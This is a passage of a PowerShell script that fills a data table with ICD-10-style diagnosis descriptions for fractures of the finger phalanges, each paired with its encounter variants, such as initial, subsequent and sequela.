unspecified phalanx of right little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right little finger","Fracture of unspecified phalanx of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left little finger","Fracture of unspecified phalanx of left little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left little finger","Fracture of unspecified phalanx of left little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left little finger","Fracture of unspecified phalanx of left little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left little finger","Fracture of unspecified phalanx of left little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left little finger","Fracture of unspecified phalanx of left little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left little finger","Fracture of unspecified phalanx of left little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left little finger","Fracture of unspecified phalanx of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of other finger","Fracture of unspecified phalanx of other finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of other finger","Fracture of unspecified phalanx of other finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of other finger","Fracture of unspecified phalanx of other finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of other finger","Fracture of unspecified phalanx of other finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of other finger","Fracture of unspecified phalanx of other finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of other finger","Fracture of unspecified phalanx of other finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of other finger","Fracture of unspecified phalanx of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified finger","Fracture of unspecified phalanx of unspecified finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified finger","Fracture of unspecified phalanx of unspecified finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified finger","Fracture of unspecified phalanx of unspecified finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified finger","Fracture of unspecified phalanx of unspecified finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified finger","Fracture of unspecified phalanx of unspecified finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified finger","Fracture of unspecified phalanx of unspecified finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified finger","Fracture of unspecified phalanx of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right index finger","Displaced fracture of proximal phalanx of right index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right index finger","Displaced fracture of proximal phalanx of right index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right index finger","Displaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right index finger","Displaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right index finger","Displaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right index finger","Displaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right index finger","Displaced fracture of proximal phalanx of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left index finger","Displaced fracture of proximal phalanx of left index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left index finger","Displaced fracture of proximal phalanx of left index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left index finger","Displaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left index finger","Displaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left index finger","Displaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left index finger","Displaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left index finger","Displaced fracture of proximal phalanx of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right middle finger","Displaced fracture of proximal phalanx of right middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right middle finger","Displaced fracture of proximal phalanx of right middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right middle finger","Displaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right middle finger","Displaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right middle finger","Displaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right middle finger","Displaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right middle finger","Displaced fracture of proximal phalanx of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left middle finger","Displaced fracture of proximal phalanx of left middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left middle finger","Displaced fracture of proximal phalanx of left middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left middle finger","Displaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left middle finger","Displaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left middle finger","Displaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left middle finger","Displaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left middle finger","Displaced fracture of proximal phalanx of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right ring finger","Displaced fracture of proximal phalanx of right ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right ring finger","Displaced fracture of proximal phalanx of right ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right ring finger","Displaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right ring finger","Displaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right ring finger","Displaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right ring finger","Displaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right ring finger","Displaced fracture of proximal phalanx of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left ring finger","Displaced fracture of proximal phalanx of left ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left ring finger","Displaced fracture of proximal phalanx of left ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left ring finger","Displaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left ring finger","Displaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left ring finger","Displaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left ring finger","Displaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left ring finger","Displaced fracture of proximal phalanx of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right little finger","Displaced fracture of proximal phalanx of right little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right little finger","Displaced fracture of proximal phalanx of right little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right little finger","Displaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right little finger","Displaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right little finger","Displaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right little finger","Displaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right little finger","Displaced fracture of proximal phalanx of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left little finger","Displaced fracture of proximal phalanx of left little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left little finger","Displaced fracture of proximal phalanx of left little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left little finger","Displaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left little finger","Displaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left little finger","Displaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left little finger","Displaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left little finger","Displaced fracture of proximal phalanx of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of other finger","Displaced fracture of proximal phalanx of other finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of other finger","Displaced fracture of proximal phalanx of other finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of other finger","Displaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of other finger","Displaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of other finger","Displaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of other finger","Displaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of other finger","Displaced fracture of proximal phalanx of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified finger","Displaced fracture of proximal phalanx of unspecified finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified finger","Displaced fracture of proximal phalanx of unspecified finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified finger","Displaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified finger","Displaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified finger","Displaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified finger","Displaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified finger","Displaced fracture of proximal phalanx of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right index finger","Displaced fracture of middle phalanx of right index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right index finger","Displaced fracture of middle phalanx of right index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right index finger","Displaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right index finger","Displaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right index finger","Displaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right index finger","Displaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right index finger","Displaced fracture of middle phalanx of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left index finger","Displaced fracture of middle phalanx of left index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left index finger","Displaced fracture of middle phalanx of left index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left index finger","Displaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left index finger","Displaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left index finger","Displaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left index finger","Displaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left index finger","Displaced fracture of middle phalanx of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right middle finger","Displaced fracture of middle phalanx of right middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right middle finger","Displaced fracture of middle phalanx of right middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right middle finger","Displaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right middle finger","Displaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right middle finger","Displaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right middle finger","Displaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right middle finger","Displaced fracture of middle phalanx of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left middle finger","Displaced fracture of middle phalanx of left middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left middle finger","Displaced fracture of middle phalanx of left middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left middle finger","Displaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left middle finger","Displaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left middle finger","Displaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left middle finger","Displaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left middle finger","Displaced fracture of middle phalanx of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right ring finger","Displaced fracture of middle phalanx of right ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right ring finger","Displaced fracture of middle phalanx of right ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right ring finger","Displaced fracture of middle phalanx of right ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right ring finger","Displaced fracture of middle phalanx of right ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right ring finger","Displaced fracture of middle phalanx of right ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right ring finger","Displaced fracture of middle phalanx of right ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right ring finger","Displaced fracture of middle phalanx of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left ring finger","Displaced fracture of middle phalanx of left ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left ring finger","Displaced fracture of middle phalanx of left ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left ring finger","Displaced fracture of middle phalanx of left ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left ring finger","Displaced fracture of middle phalanx of left ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left ring finger","Displaced fracture of middle phalanx of left ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left ring finger","Displaced fracture of middle phalanx of left ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left ring finger","Displaced fracture of middle phalanx of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of right little finger","Displaced fracture of medial phalanx of right little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of right little finger","Displaced fracture of medial phalanx of right little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of right little finger","Displaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of right little finger","Displaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of right little finger","Displaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of right little finger","Displaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of right little finger","Displaced fracture of medial phalanx of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of left little finger","Displaced fracture of medial phalanx of left little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of left little finger","Displaced fracture of medial phalanx of left little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of left little finger","Displaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of left little finger","Displaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of left little finger","Displaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of left little finger","Displaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of left little finger","Displaced fracture of medial phalanx of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of other finger","Displaced fracture of medial phalanx of other finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of other finger","Displaced fracture of medial phalanx of other finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of other finger","Displaced fracture of medial phalanx of other finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of other finger","Displaced fracture of medial phalanx of other finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of other finger","Displaced fracture of medial phalanx of other finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of other finger","Displaced fracture of medial phalanx of other finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of other finger","Displaced fracture of medial phalanx of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of unspecified finger","Displaced fracture of medial phalanx of unspecified finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of unspecified finger","Displaced fracture of medial phalanx of unspecified finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of unspecified finger","Displaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of unspecified finger","Displaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of unspecified finger","Displaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of unspecified finger","Displaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial phalanx of unspecified finger","Displaced fracture of medial phalanx of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right index finger","Displaced fracture of distal phalanx of right index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right index finger","Displaced fracture of distal phalanx of right index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right index finger","Displaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right index finger","Displaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right index finger","Displaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right index finger","Displaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right index finger","Displaced fracture of distal phalanx of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left index finger","Displaced fracture of distal phalanx of left index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left index finger","Displaced fracture of distal phalanx of left index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left index finger","Displaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left index finger","Displaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left index finger","Displaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left index finger","Displaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left index finger","Displaced fracture of distal phalanx of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right middle finger","Displaced fracture of distal phalanx of right middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right middle finger","Displaced fracture of distal phalanx of right middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right middle finger","Displaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right middle finger","Displaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right middle finger","Displaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right middle finger","Displaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right middle finger","Displaced fracture of distal phalanx of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left middle finger","Displaced fracture of distal phalanx of left middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left middle finger","Displaced fracture of distal phalanx of left middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left middle finger","Displaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left middle finger","Displaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left middle finger","Displaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left middle finger","Displaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left middle finger","Displaced fracture of distal phalanx of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right ring finger","Displaced fracture of distal phalanx of right ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right ring finger","Displaced fracture of distal phalanx of right ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right ring finger","Displaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right ring finger","Displaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right ring finger","Displaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right ring finger","Displaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right ring finger","Displaced fracture of distal phalanx of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left ring finger","Displaced fracture of distal phalanx of left ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left ring finger","Displaced fracture of distal phalanx of left ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left ring finger","Displaced 